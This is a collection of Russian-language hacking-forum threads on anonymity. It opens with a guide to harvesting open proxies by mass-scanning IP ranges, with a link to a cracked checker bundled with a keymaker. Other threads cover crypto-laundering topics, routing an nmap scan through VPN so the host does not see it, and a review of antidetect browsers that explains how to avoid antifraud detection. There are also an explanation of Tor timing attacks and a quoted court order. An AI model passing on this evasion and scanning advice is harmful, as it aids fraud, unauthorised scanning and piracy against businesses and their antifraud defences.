достаточно выставить самые основные ,т.е. 8080,80,3128 ну и если вы более разбираетесь в портах, то сами полистайте
+ этой проги есть то, что она не сильно грузит трафик
**
Proxy Hunter** :zns5: Скачать|Download
Тут немного сложнее.
Сначало создаем Task. Там указываем диапазон (1.1.1.2 - 255.255.255.255 и порты. Еще немного фич, но тут и олень разберется.
Затем жмем Старт и ждем-с...
Прогой также можно менять прокси на лету (перед этим настроив на нее браузер)

При скане к вам попадают прокси не только из паблика, но и с привата.
Еще одним + такого метода есть то, что прокси, добытые этим образом не надо чекать.
**
3. Крысятничество**
Зашли на сайт и забрали самый свежый лист.
тут
тут
и
тут

Самый рациональный способ.
Осталось только прочекать.

Чекаем прокси.
Для чеканья нам нужен чеккер.
HellLabs Proxy Checker Pro v7.4.18
:zns5: [Скачать|Download](http://rapidshare.com/files/5430340/HellLabs.Proxy.Checker.v7.4.18.Incl.Keymaker- ZWT.zip.html)
Мощнейший и полностью настраиваемый чеккер. Хорошая игрушка как для новичка - так и для профессионала.
И так, загоняем прокси - лист в чеккер, увеличиваем количество потоков, и жмем на кнопочку |> (примечание, для установки количества потоков в WinXP SP2 and Windows 2003 Server SP1 beta более 50 надо пропатчить систему link 1 link 2)
Для ускорения работы можно в опциях отключить проверку поддерживания Сокс для портов 1080.
Далее меняем установки експорта на IP:Port, и експортируем лист.
Но не в коем случае на юзайте онлайн чеккеры!!! Прокси, которые там засветились, сдыхают уже через час. Пусть вас не манит скорость их чека.

Все, лист подано: юзайте.

Автор: HAWK , то есть я.

Безопасность криптовалют, платежей (все темы)

ID: 676533bbb4103b69df3718da
Thread ID: 87968
Created: 2023-05-14T14:39:13+0000
Last Post: 2024-11-29T10:42:59+0000
Author: r_as
Replies: 55 Views: 9K

Статья - Безопасность в мире криптовалют
Статья - Биткоин-миксеры: зачем они нужны и стоит ли ими пользоваться?
Статья - Деанонимизация биткойн-вымогателя с использованием теории вероятности

Тема - METAMASK - Сеть Ethereum Mainnet / URL-адрес RPC
Тема - Анонимное и безопасное получение налички
Тема - Отслеживание номеров купюр
Тема - Как заходить на киви кошельки через анонимную систему, не получив бан?
Тема - Безопасное хранение сид фраз?
Тема - Как лучше обменять биткоин на монеро?
Тема - Анонимность в крипте. Кажется ее не существует.
Тема - Getting cryptocurrency anonymously? How's it done?
Тема - Как проверить что крипта "белая"?
Тема - Anonymous Virtual Card Provider
Тема - Безопасность patreon
Тема - Анонимные платежи
Тема - 4istka Bitcoina / washing Bitcoin?
Тема - Анонимная транзакция криптовалютой Monero
Тема - Где и как держать биткоины
Тема - Полная верификация кошельков
Тема - Как чистят грязную крипту?

Анонимность в 2024, миф или реальность?

ID: 676533bbb4103b69df3718f6
Thread ID: 120997
Created: 2024-08-18T16:44:39+0000
Last Post: 2024-11-28T19:54:46+0000
Author: swagcat228
Replies: 63 Views: 9K

доброго времени суток, Дамага.

Вот такой вот вопрос мне навеяло рядом последних событий.

Для большей ясности я бы разделил слои абстракции на программный и аппаратный.
В программном бы выделил r0 и r3 - к примеру твики ядра и десктопное окружение соответственно.
Сюда отнес бы глобальные вещи как броузер (васмы, вебртц), дистрибутивы, оконные окружения, криптографию (постквант?).
А на хардварном выделил бы те материи, которые начинаются от UEFI/Legacy и идут глубже. IME, AMT, PSP, SMM, etc...
Плюс на хардварном то, что идет рядом тем, что выше - hdd/nvme fw, eth fw, gpu fw, SB/NB fw, wireless fw, BMC fw (особенно), etc...
Ну и еще есть микроархитектура под крышечкой процессора...

Кто что думает по этому поводу?

СОРМ2

ID: 676533bbb4103b69df371956
Thread ID: 21339
Created: 2011-03-21T17:17:32+0000
Last Post: 2024-06-07T08:22:51+0000
Author: Se613
Replies: 45 Views: 9K

СОРМ
Как на самом деле работает система и есть ли от неё толк? Помогает ли vpn и duble vpn?
В общем хотелось бы увидеть мнения знающих людей.

Анонимность, безопасность VPS, VDS, dedicated hosting

ID: 676533bbb4103b69df37197a
Thread ID: 75760
Created: 2022-11-08T12:06:09+0000
Last Post: 2024-04-25T06:35:53+0000
Author: cum1337
Replies: 109 Views: 9K

Здравствуйте. Имеется VPS с установленной Kali Linux. Недавно настроил ее, попытался просканировать порты у другой VPS (сканировал без VPN и прочего, чисто для теста). Так вот, мой хостер сообщил мне, что заподозрил меня в сканировании портов. Как я понял, то трафик идет через его какую-то систему, где эти моменты фиксируются (если не прав, то поправте пожалуйста). Так вот, подключил VPN и просканировал порты через VPN. Вопрос состоит в том, что при таком методе я скрываю от глаз хостера факт сканирования или нет? Приведу вывод nmap с --traceroute где сканирую через VPN и напрямую.

Без VPN:

Code:Copy to clipboard

proxychains -q nmap 192.168.0.159 -p 3389 -Pn --traceroute       
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-08 06:58 EST
Nmap scan report for 192.168.0.159
Host is up (0.00054s latency).

PORT     STATE    SERVICE
3389/tcp filtered ms-wbt-server

TRACEROUTE (using proto 1/icmp)
HOP RTT     ADDRESS
1   0.32 ms xxx.x5x.162.4
2   0.78 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
3   0.75 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
4   0.75 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
5   0.73 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
6   0.74 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
7   0.75 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
8   0.77 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
9   0.78 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
10  0.83 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
11  0.52 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
12  0.49 ms XXX.XXX-par11.ip4.gtt.net (x.x.x4x.205)
13  ... 30

Правильно ли я понимаю, что трафик при сканировании идет напрямую через хостера?

Сканирование через VPN (как я понял):

Code:Copy to clipboard

proxychains -q nmap 192.168.0.159 -p 3389 -Pn -e tun0 --traceroute
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-08 07:04 EST
Nmap scan report for 192.168.0.159
Host is up.

PORT     STATE    SERVICE
3389/tcp filtered ms-wbt-server

TRACEROUTE (using proto 1/icmp)
HOP RTT    ADDRESS
1   ... 30

В таком способе гоню трафик через tun0. Верно ли, что теперь хостер не видит скан портов? Если не прав, то подскажите в каком направлении двигаться?

Анонимность, безопасность в сети (общие вопросы)

ID: 676533bbb4103b69df371a4b
Thread ID: 74925
Created: 2022-10-30T18:12:46+0000
Last Post: 2023-06-26T13:46:12+0000
Author: bazlaiter
Replies: 143 Views: 9K

Что нужно иметь чтобы оставаться анонимным в браузере, а именно что бы браузер не видел мой: ip, геолокацию, технические данные: данные об аппаратном и программном обеспечении моего устройства, имя устройства,cookie, данные об идентификаторе браузера?

Палим каждый антидетект-браузер и выбираем худший

ID: 676533bbb4103b69df371a7c
Thread ID: 43129
Created: 2020-10-11T15:07:32+0000
Last Post: 2023-04-04T14:49:40+0000
Author: Xk-ar
Prefix: Статья
Replies: 37 Views: 9K

Вступление
Все мы задавались вопросом «какой антидетект-браузер выбрать?» , и, что главное, «как выбирать?». Проблема в том, что в виду высокой сложности эмуляции чужой системы все антидетект-браузеры палятся.

В этом посте я расскажу и на примерах, аргументированно, без домыслов и теорий покажу, как они палятся, как минимизировать запал, и дам вам минимальное представление об устройстве каждого из них, чтобы вы могли выбрать сами.

Итак, у нас на операционном столе сегодня все четыре топовых браузера:

Сначала теория
1) Каждый антидетект-браузер сделан на базе движка обычного браузера. Как правило это Chromium или Firefox. Фундаментальные различия во внутреннем устройстве движков столь велики, что с помощью javascript на странице сайт всегда может определить, в каком на самом деле движке загружена страница сайта, которую мы просматриваем. Это значит, что антифрод знает, сделан ли ваш браузер на основе IE, хрома или фф.

Примеры:

только в ИЕ есть поддержка ActiveX, объекты Debug, document.security, navigator.cpuClass и десятки других,
только в ФФ и Сафари есть поддержка MathML,
только в Хроме есть shape detection api,
только в Хроме и ФФ есть поддержка кодека webM в теге video,

И этот список можно продолжать бесконечно. Различий на столько много, что для разработчиков появился отдельный сайт caniuse.com, позволяющий проверить, поддерживается ли тот или иной функционал в разных браузерах.

Отсюда первое правило работы с антидетект-браузером:

Используйте UserAgent**, соответствующий движку вашего антидетекта.**

Например, если ваш антидетект сделан на Хромиуме, и ваша ось — это мак, то используйте самый обычный UserAgent хрома на маке, например Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36

2) Железо не должно быть уникальным. Оно должно быть «таким же, как у всех».

Характеристики железа вашего пк отражаются в следующих отпечатках:

Canvas простой (2d) — с допущениями не уникален внутри каждой версии каждой ОС. Различия в отпечатках родятся из-за разницы механизмов сглаживания шрифтов в различных операционных системах.
WebGL (он же Canvas-3d) — в этом случае картинка рисуется напрямую через видеокарту (если поддержка 3d-ускорения включена в браузере и в ос/виртуалке), и внутри браузера силами его встроенного рендерера (если поддержка 3d-ускорения в ос недоступна, или отключена в браузере), не уникален для каждой комбинации «ос+видеокарта+драйвер видеокарты» в случае, если есть поддержка 3d-ускорения, и не уникален для каждой комбинации «браузер+ос», если поддержка 3d-ускорения отсутствует/выключена. На выборке 1кк US-трафа на момент написания статьи поддержки 3d-ускорения не было на пк у 16% пользователей.
Audio — не уникален внутри каждой версии аудио-чипсета вашего девайса.

Других способов опознать ваше железо через браузер на десктопе, например узнать серийник жесткого диска или процессора или цветовой профиль монитора не существует. На мобильных к списку добавляется акселерометр (и данные по его калибровке), но это тема отдельной статьи.

Желающие углубиться в теорию могут посмотреть презентацию разработчика гугла <https://elie.net/publication/picasso-lightweight-device-class-fingerprinting- for-web-clients/> (eng) про фингерпринт на основе WebGL, используемый в том числе и в ReCaptcha.

Чем более не уникальный каждый из этих отпечатков, тем меньше к вашему устройству вопросов, т.к. оно «такое же, как и все». Ни один из этих отпечатков не позволяет уникально идентифицировать ваше устройство, но позволяет условно определить его «класс» (например «ПК с дискретным видео», или «телефон, вероятно айфон»). И лучший способ держать эти отпечатки правдоподобными — не трогать их. Без шуток.

Второе правило работы с антидетект-браузером:

Не трогай свои железные отпечатки

3) Когда мы используем прокси другой страны, неизбежно встает вопрос о смене отображаемого языка, часового пояса, и возможно набора шрифтов, соответствующего вашей локали (в случае работы с азиатскими рынками)

Есть три основных способа подменить в браузере возвращаемые через javascript значения языков, часового пояса, разрешения экрана и тд:

переписать эти функции в исходном коде браузера, до его компиляции. Это самый надежный и самый сложно определяемый способ.
заинжектиться в работающий процесс вкладки и перехватывать обращения к нужным функциям в реальном времени. Технически сложно, т.к. смещения и адреса функций плывут с каждым обновлением браузера.
перезаписать нужные нам значения прямо на странице через javascript же, после инициализации страницы, которую мы просматриваем. Самый простой в реализации, но самый отвратительный способ, т.к. сделать это незаметно действительно сложно. Как я покажу дальше, почти все антидетект-браузеры выбрали этот путь, чем подставили своих пользователей.

Третье правило антидетект-браузера:

Не трогай и не модифицируй через javascript ничего на странице/сайте

Снова обратимся к теории, чтобы понять, как сайт/антифрод может определить, что параметры браузера подменены через javascript.

Чаще всего нам нужно подменять язык ос, чтобы он соответствовал локации пользователя. Кроме того, что он передается на сайт в заголовке Accept- Language , он доступен для js через переменную navigator.language.

Свойства объекта navigator нельзя просто перезаписать, т.к. они доступны только для чтения. Read-only-объекты в javascript традиционно реализуются через создание у объекта пустого setter-a и не пустого getter-a, возвращающего нужное значение. По-этому у нас всегда остается возможность перезаписать такие объекты через вызов Object.defineProperty:

Мы можем присвоить изменяемому объекту value, а можем навесить на него свой getter, перезаписав его родной, и сохранив таким образом «нативное» read-only поведение этого объекта:
Вуа-ля, мы подменили нужное нам значение. Но что же могло пойти не так?

Все. Все пошло не так, Наташ.

Изначально такие объекты как navigator, screen и некоторые другие не имеют собственных свойств, а наследуют все свойства от конструктора старшего брата (объектов Navigator и Screen соответственно). А вызов Object.defineProperty на любом из этих объектов создает у них собственные свойства:

Таким образом любой сайт/антифрод просто вызвав одну строчку кода

if( Object.getOwnPropertyNames(navigator)[0] ) alert('fake parameters detected');

может определить, что параметры нашего браузера — фальшивка. И в этот момент все навороченные защиты и эмуляции становятся бесполезны.

Ныряем
Теперь, когда мы определились, куда будем смотреть, перейдем к нашим котятам. Для создания профилей я выбирал дефолтные настройки, без прокси, с минимально- возможными подменами отпечатков и переменных окружения (экран, цветность, х*е-мое)

Indigo
Вариант, собранный на базе Хромиума, с кодовым названием «Mimic».

Самый крепко сбитый браузер из всех, а так же единственный браузер, в котором подмена параметров реализована в исходниках, а не через js.

Ничего нигде не торчит, ничего не палится, кроме…

На чем палится
1) Выключен http3 протокол, который по-умолчанию доступен в хроме с 2013 года. Каждый сайт видит тип соединения и протокол (http1.1, h2 или http/2+quic, он же http3), по которому к нему обращаются. И в случае, если к сайту, поддерживающему http3 идет обращение от хрома, но по http2, то или это обращение идет через прокси, или это не настоящий хром. И первый и второй выводы, сделанные анти-фрод системой — плохи для нас.

2) При отрисовке текста в качестве моноширинного шрифта используется шрифт Times, который не является моноширинным. В дикой природе это невозможно и это очевидный признак подмены шрифтов. Моноширинный шрифт — тот, у которого ширина всех символов (например w и i) одинаковая, например Courier new. Согласно спецификации при указании в стилях элемента font-family: monospace; браузер должен взять один из доступных моноширинных шрифтов (в системе хотя бы один такой шрифт обязательно доступен).

разница видна даже на глаз

Несоответствие шрифта сайт может определить отрисовав его на канвасе, и померив, совпадает ли ширина символа ' и w, например. Разницу вы можете заметить сами на скриншоте выше. В случае с Indigo любой сайт (и антифрод) может увидеть, что используется фальшивый шрифт, а не родной системный.

На этом с Indigo все.

Linken Sphere
Антидетект на базе хромиума. Самый дорогой из всех, и самый рекламируемый. В его толстовках приходят на интервью в «Люди-Pro», и его пиарят в журнале «Хакер». Последний раз он обновлялся 13/09/2019 (пол года тому назад) и вот тут начинается безобразие.

На чем палится

На самом деле он собран на базе хромиума от ~2018 года:

а значит мы не только лишены не самых нужных вещей, типа поддержки apng, VP9 и AV1 кодеков, но и открыты к множеству уязвимостей, которые были исправлены в хроме за эти годы.

2) Так же, как и в Indigo не работает поддержка http3.

3) Все параметры подделываются после инициализации страницы с помощью javascript, и любой сайт может это видеть (с помощью метода, который я описал выше):

что тут скажешь…

Паршиво. Но можно ли сдедать хуже? Посмотрим

AntBrowser
Антидетект на базе ФФ, позиционарующий себя как инструмент для работы с ру- сервисами типа Авито и Юлы.

На чем палится
1) По скольку браузер на базе ФФ, все попытки представиться хромом будут провалены, из-за разницы в устройстве движков. Наличие переменной window.chrome — как раз такая неудачная попытка. На странице одновременно присутствует объект window.chrome и объекты sidebar, screen.mozLockOrientation, navigator.oscpu, которые однозначно указывают, что движок браузера — ФФ

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F3-1.png&hash=5f6eb50deac796b3afaf2c1e6803d815)

2) Так же как и в Indigo используется фарш из шрифтов. И используется обыкновенный шрифт вместо моноширинного:

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F8.png&hash=46c700815dbc075f9e252285820a68c6)

3) Все переменные на странице подменяются через javascript:

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F9.png&hash=f554feb99bc0ebdf3b65798eaed5ad57)

Разработчик пытался исправить ситуацию, и подменял не свойства самого объекта navigator, а свойства у прототипа его конструктора navigator.constructor.prototype. И это бы сработало, если бы их геттеры не содержали десятки килобайт обфусцированного кода, который доступен каждому сайту/антифроду.

4) На каждой странице в dom-дереве к тегу добавляется параметр data-acxscriptallow="true", который указывает, что на странице запущено расширение для браузера [AudioContext Fingerprint Defender](https://chrome.google.com/webstore/detail/audiocontext- fingerprint/pcbjiidheaempljdefbdplebgdgpjcbe?hl=en). То есть код этого расширения был содран и добавлен в антидетект «как есть».

Можно ли сделать еще хуже?

AEZAKMI
Антидетект на основе хромиума. Позиционируется как «Cheat Code for Your Anonimity».

На старте при создании профиля разработчики пытаются удержать нас от возможности слить реальные webGL-отпечатки, разрешая только создание профиля с отключенной поддержкой 3d-ускорения:

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F10.png&hash=6e81d9a6bdb47c6a0c1f0fbc3dc42423)

«ANGLE» в названии указывает на отсутствие поддержки 3d-ускорения в браузере

Но на этом хорошие новости заканчиваются.

На чем палится
1) Браузер из коробки запускается с флагом —disable-web- security. Это на столько плохо, на сколько вообще может быть.

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F11.png&hash=f5f9aa973f659a327e4af10a1c36c5cd)

Запущенный таким образом хром не только отключает CORS, но и дает сайтам доступ к локальным файлам на вашем диске.

Любой сайт может обратиться, например, к facebook.com и получить все наши данные, или запросить любые файлы с нашего диска, такие как файл сессии telegram или историю переписки в skype.

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F12.png&hash=fc012f9cd7e9fcb68f6f2166d3459786)

2) так же, как и в случае с AntBrowser, на каждой странице к тегу добавляются параметры data-cbscriptallow="true" и data-acxscriptallow="true", которые указывают на присутствие кода от расширений для спуфинга canvas и audio отпечатков.

3) Массив плагинов подделывается криво и не имеет поля собственной длинны:

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F13-1.png&hash=b22bd529af3cfb3694993c55474e2fc4)

Это однозначно указывает на то, что список плагинов фальшивый.

4) На каждой странице в глобальную переменную webglResponseStr помещается весь текущий конфиг профиля браузера целиком:

![](/proxy.php?image=https%3A%2F%2Fcpa.rip%2Fwp- content%2Fuploads%2F2020%2F04%2F14.png&hash=1807462f13c87c1cb43aec6289c02524)

Нет ни одной причины так делать в трезвом уме и здравой памяти

В этих данных содержатся в том числе:

имя текущего профиля
ваш логин на сайте AEZAKMI
Все данные по используемому прокси: proxyIp, proxyPort, proxyUser, proxyPassword в открытом виде.

И к этим данным имеет доступ любой сайт, который вы откроете в этом антидетекте.

Резюмируя, AEZAKMI — это будка самоубийцы, ценой в 70$ в месяц.

Заключение
Действительно ли все на столько плохо на рынке антидетектов? Да, на данный момент, безусловно все паршиво.

Столь безответственное отношение большинства разработчиков антидетектов к своим клиентам и их материалу — это не то, что нужно индустрии. Рынку нужно знание, прозрачность и конкуренция. В душе я жду, что появится больше игроков, руководствующихся принципом «нормально делай — нормально будет», а не «и так сойдет».

«Так каким антидетектом пользоваться-то?». Мой ответ — «никаким «, Но…

…удобство, которое приносит управление десятками профилей из одной программы подкупает, и если вам все же нужен именно антидетект-браузер, на данный момент берите Indigo — за него с некоторыми допущениями не стыдно.

До встреч.

**Данная статья копия.
Объясняю: Мне показалось что многие не осознают что пользуются не очень качественным софтом, и поделится данной статьей на этом форуме
Оригинал статьи на канале: **https://tlgrm.biz/oxbadad

Назови 3 причины не использовать Windows обычным хорошим людям

ID: 676533bbb4103b69df371c57
Thread ID: 46167
Created: 2020-12-30T11:01:01+0000
Last Post: 2021-01-19T19:12:16+0000
Author: tipokipocod
Replies: 104 Views: 9K

Назови 3 причины не использовать Windows обычным хорошим людям

мега-курса по анонимности от Codeby

ID: 676533bbb4103b69df371d13
Thread ID: 26241
Created: 2018-10-05T00:09:16+0000
Last Post: 2019-10-31T17:49:50+0000
Author: xrahitel
Replies: 29 Views: 9K

продажник [тыц](https://codeby.net/forum/threads/kurs-po-anonimnosti-i- bezopasnosti-v-seti-internet.63123/) скачать [тут](https://telegra.ph/Sliv- mega-kursa-po-anonimnosti-ot-Codeby-10-03) если честно сам не смотрел ещё...

Что такое СОРМ и можно ли его обойти?

ID: 676533bbb4103b69df371907
Thread ID: 54619
Created: 2021-07-30T18:34:12+0000
Last Post: 2024-11-15T07:26:20+0000
Author: Veil
Replies: 79 Views: 8K

Все юзеры форума пользуются услугами провайдеров. Все знаю, что у них стоит СОРМ, ужасный и могучий. А вот что он может и что нам соответственно ждать от этого, чего нам нельзя и что нужно? Что скажете форумчане? Ваши советы, знания матчасти очень пригодятся в дальнейшем всем нам. К глубокому сожалению я его еще полностью не постиг, поэтому запиливать статью пока не буду. Соберу основной материал. Основные взгляды на СОРМ парни? Пишите, чем больше, тем лучше. Тем обьемнее выйдет запил статьи.

Как спецслужбы найдут тебя

ID: 676533bbb4103b69df371cea
Thread ID: 31137
Created: 2019-08-17T09:10:54+0000
Last Post: 2020-04-13T12:47:45+0000
Author: antikrya
Replies: 29 Views: 8K

Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача – вычислить особо опасного преступника, занимающегося шантажом и появляющегося в сети периодически и только для передачи данных. Для преступной деятельности он завел отдельный ноутбук, из которого «вырезал» микрофон, колонки и камеру. Разумное решение, учитывая, что колонки тоже умеют слушать.

В качестве операционной системы он использует Tails, хотя для максимальной анонимности стоило бы взять Whonix. Так или иначе, весь трафик идет через Tor, он не доверяет VPN, да и для работы в Даркнете Tor ему все равно необходим.

Для общения он использует Jabber с PGP-шифрованием, он мог бы поставить и Телеграм, но это представитель старой школы преступников. Даже если у вас будет доступ к серверу Jabber, вы сможете получить лишь зашифрованные данные и IP-адреса Тор. Это бесполезная информация.

Преступник работает по принципу «молчание-золото», лишнего не скажет, ссылки или файла не откроет. Известно лишь, что он должен находиться в одной стране с вами. Казалось бы, шансов установить его личность нет, но это иллюзия, установить его личность можно несмотря на все принимаемые им меры.

Описанный случай идеален для применения тайминг-атаки по мессенджеру. Первым делом необходима программа, которая будет отслеживать и записывать все входы и выходы пользователя. Он появился в сети – система сразу отмечает у себя время, ушел – система записала время выхода.

Лог выглядит примерно так: таблица входов и выходов

Теперь на руках у вас есть лог его активности за несколько дней, пришло время воспользоваться системой ОРМ (оперативно-розыскных мероприятий). Подобные системы есть в распоряжении спецслужб большинства стран, в России это СОРМ. Нужно выяснить, кто в эти временные промежутки +/- 5 минут в вашей стране подключался к сети Tor.

Мы знаем, что цель, которую необходимо деанонимизировать, подключилась 22.04.2018 в 11:07 и отключилась в 12:30. В эти же временные точки (+/- 5 минут) на территории страны подключились к сети Tor и отключились от нее 3000 человек. Мы берем эти 3000 и смотрим, кто из них снова подключился в 14:17 и отключился в 16:54, как думаете, сколько человек останется?

Так, шаг за шагом, круг сужается, и в итоге вам удастся вычислить место выхода в сеть преступника. Чем чаще он заходит в сеть и чем меньше в это время других пользователей, тем быстрее сработает тайминг-атака.

Что может помешать проведению тайминг-атаки.
Постоянная смена точек выхода в сеть делает подобную атаку бессмысленной. Если же цель периодически меняет точки выхода, это может затруднить поиск, но является заранее допустимым вариантом и не способно запутать систему.

Мы надеемся, что наши читатели не относятся к разыскиваемым преступникам и им не придется кочевать из одного кафе с публичным Wi-Fi в другое. Однако вторым советом против тайминг-атаки стоит воспользоваться каждому. Речь идет об отключении на уровне мессенджера передачи информации о статусе либо установлении постоянного статуса «офлайн». Большинство мессенджеров предоставляют одну из подобных возможностей.

Вот так это выглядит в Телеграм:

Если в вашем мессенджере возможно скрыть данные о вашем статусе, скройте эту информацию.

Дополнительным инструментом защиты от тайминг-атаки может стать прекращение включения мессенджера вместе с подключением к сети. Как вы можете понять из описания атаки, сверяется время входа/выхода в сеть и появление на связи/уход в офлайн в мессенджере. Допускается погрешность, но она не должна быть очень большой. Если цель атаки подключится к Tor и лишь спустя час запустит мессенджер, очень сложно будет связать вход в сеть и статус в мессенджере. Кроме этого, тайминг-атаки абсолютно бесполезны против анонимного мессенджера Bitmessage.

Источник

Вопрос об анонимности

ID: 676533bbb4103b69df371d5f
Thread ID: 28314
Created: 2019-03-16T17:40:20+0000
Last Post: 2019-04-14T17:11:30+0000
Author: zenonvv7
Replies: 24 Views: 8K

Можно ли быть анонимным в интернете и быть дома , а не ездить по городу периодически выходя в интернет, если у тебя планшет с тел. карточкой?

"Анонимный" Protonmail сливает данные

ID: 676533bbb4103b69df371d81
Thread ID: 27113
Created: 2019-01-02T13:00:11+0000
Last Post: 2019-01-10T11:53:22+0000
Author: tabac
Replies: 34 Views: 8K

PROTONMAIL.COM - ВЫ ПОЛНОСТЬЮ АНОНИМНЫ

Теория:

Нам часто задают вопрос: почему ProtonMail базируется в Швейцарии и есть ли реальные преимущества?

Мы считаем, что есть и в этой статье мы поделимся почему. Первое, что приходит на ум, это то, что Швейцария находится за пределами юрисдикции США и ЕС. Если вы не размещаете свои серверы на лодке в международных водах, вам нужно будет находиться под определенной юридической юрисдикцией и в среде после Лавабита, этот выбор особенно важен. Распространенным заблуждением является то, что ЕС предлагает больше правовой защиты, чем США, но многие из тех же директив по надзору, которые существуют в законодательстве США, также имеют аналоги ЕС, в частности, немецкое законодательство может фактически предложить меньшую правовую защиту, чем американское законодательство.

Швейцария, однако, НЕ является частью ЕС, и Швейцария применяет совсем другой свод законов о конфиденциальности. В США и ЕС могут быть выданы приказы о кляпе, чтобы человек не знал, что он расследуется или находится под наблюдением. Хотя такого рода приказы также существуют в Швейцарии, прокуроры обязаны уведомить цель надзора как можно скорее, и у цели есть возможность подать апелляцию в суд. Не существует таких вещей, как письма о национальной безопасности, и все запросы на наблюдение ДОЛЖНЫ проходить через суды (в Германии это не так). Кроме того, в то время как Швейцария является участником международных договоров о помощи, такие запросы на информацию должны выполняться в соответствии с законодательством Швейцарии, которое содержит более строгие положения о конфиденциальности.

Почти в каждой стране мира существуют законы, регулирующие законный перехват электронных сообщений. В Швейцарии эти правила изложены в Федеральном законе Швейцарии о надзоре за почтовым и телекоммуникационным трафиком (SPTT), последний раз пересмотренном в 2012 году. В SPTT обязательство предоставлять технические средства для законного перехвата возлагается только на провайдеров доступа в Интернет. Таким образом, ProtonMail, как простой поставщик интернет-приложений, полностью исключен из сферы применения SPTT. Это означает, что в соответствии со швейцарским законодательством ProtonMail не может быть вынужден взломать нашу защищенную систему электронной почты. Как швейцарская компания, ProtonMail также не может быть вынужден заниматься массовым надзором со стороны американских спецслужб .

Эта комбинация факторов означает, что Lavabit-подобная ситуация не может возникнуть с ProtonMail. Тем не менее, ProtonMail продвинул концепцию Lavabit на один шаг вперед и фактически даже не обладает ключами, необходимыми для расшифровки пользовательских данных. В результате, даже если ProtonMail будет вынужден перевернуть все наши компьютерные системы, содержимое электронной почты будет продолжать шифроваться.

Мы считаем, что всеобъемлющей безопасности можно достичь только путем сочетания технологий и правовой защиты, а Швейцария обеспечивает оптимальное сочетание обоих. Соединяя передовую ИТ-инфраструктуру Швейцарии с уникальной правовой средой, ProtonMail может предоставлять надежный и безопасный сервис.

Click to expand...

Реалии:

Следователь Солодун Д.В., обратилась в суд с ходатайством, которое согласовано с прокурором Шиманским В.В., о временном доступ к документам провайдера связи, сервер которого физически находится в Королевстве Нидерланды.

Ходатайство мотивировано тем, что у следователя в производстве находятся материалы досудебного расследования № 12017020010001838, по признакам уголовного преступления, предусмотренного ч. 1 ст. 147 УК Украины, в связи с чем у органа предварительного расследования возникла необходимость в получении разрешения на временный доступ к вещам и документам.

При рассмотрении, из материалов ходатайства установлено, что в Винницкий ОП ГУ ЧП в Винницкой области обратился ___ с заявлением о том, что неизвестные лица умышленно удерживают _____ с целью побуждения родственников последнего к уплате денежных средств в сумме 68 287, 76 долларов США.

Установлено, что с целью получения денежного вознаграждения, об освобождении _____ преступники оказали адрес электронной почты с паролем, которая была создана с помощью электронного почтового онлайн-сервиса protonmail.com, который в дальнейшем предоставил информацию, что регистрация электронной почты_____ на сайте protonmail.com состоялась 10.03.2017, при регистрации использовался IP-адрес ___. В дальнейшем установлено, что указанная ИР - адрес используется VPN - провайдером, сервер которого физически находится в Королевстве Нидерланды.

В связи с изложенным и необходимостью обращения с запросом об оказании международной правовой помощи в компетентные органы Королевства Нидерланды, нужно получить разрешение суда на временный доступ к информации о пользователях (юридического, физического лица) каким были предоставлены в пользование IP - адрес: ____, с указанием IP-- адресов, которые использовались для входа в панель управления с отображением точного времени входа, номеров телефонов, электронных почтовых ящиков, логинов, имен, других регистрационных данных, которые были указаны при в ержанни услуги, а также реквизитов банковских, электронных платежных систем, используемых для оплаты получении услуги в период времени с 00:00 UTC 10.03.2017 по настоящее время. Указанная информация поможет выяснить обстоятельств совершения преступления и степени причастности к ним лиц, совершивших указанное уголовное преступление.

На основании изложенного, руководствуясь ст. 40, 131, 132, 159-164, 551, 552 УПК Украины, следователь просил суд данное ходатайство удовлетворить.

Следователь в судебном заседании ходатайство поддержала при обстоятельствах изложенных в нем.

Согласно ст. 159 УПК Украины временный доступ к вещам и документам состоит в предоставлении стороне уголовного производства лицом, во владении которой находятся такие вещи и документы, возможности ознакомиться с ними, сделать их копии, в случае принятия соответствующего решения следственным судьей, судом, изъять их (осуществить их выемку). Временный доступ к электронным информационным системам или их частей, мобильных терминалов систем связи осуществляется путем снятия копии информации, содержащейся в таких электронных информационных системах или их частях, мобильных терминалах систем связи, без их изъятия.

В соответствии со ст. 160 УПК Украины стороны уголовного производства имеют право обратиться к следственному судье во время досудебного расследования или суда во время судебного разбирательства с ходатайством о временном доступ к вещам и документам, за исключением указанных в статье 161 настоящего Кодекса.

Пунктом 1 ч. 5 ст. 163 УПК Украины предусмотрено, что решение о предоставлении временного доступа к вещам и документам выносится, если сторона уголовного производства докажет наличие оснований считать, что эти вещи или документы находятся или могут находиться во владении соответствующего юридического лица.

ПОСТАНОВИЛ:

Ходатайство старшего следователя СУ ГУ ЧП в Винницкой области капитана полиции Солодун Дианы Витальевны - удовлетворить.

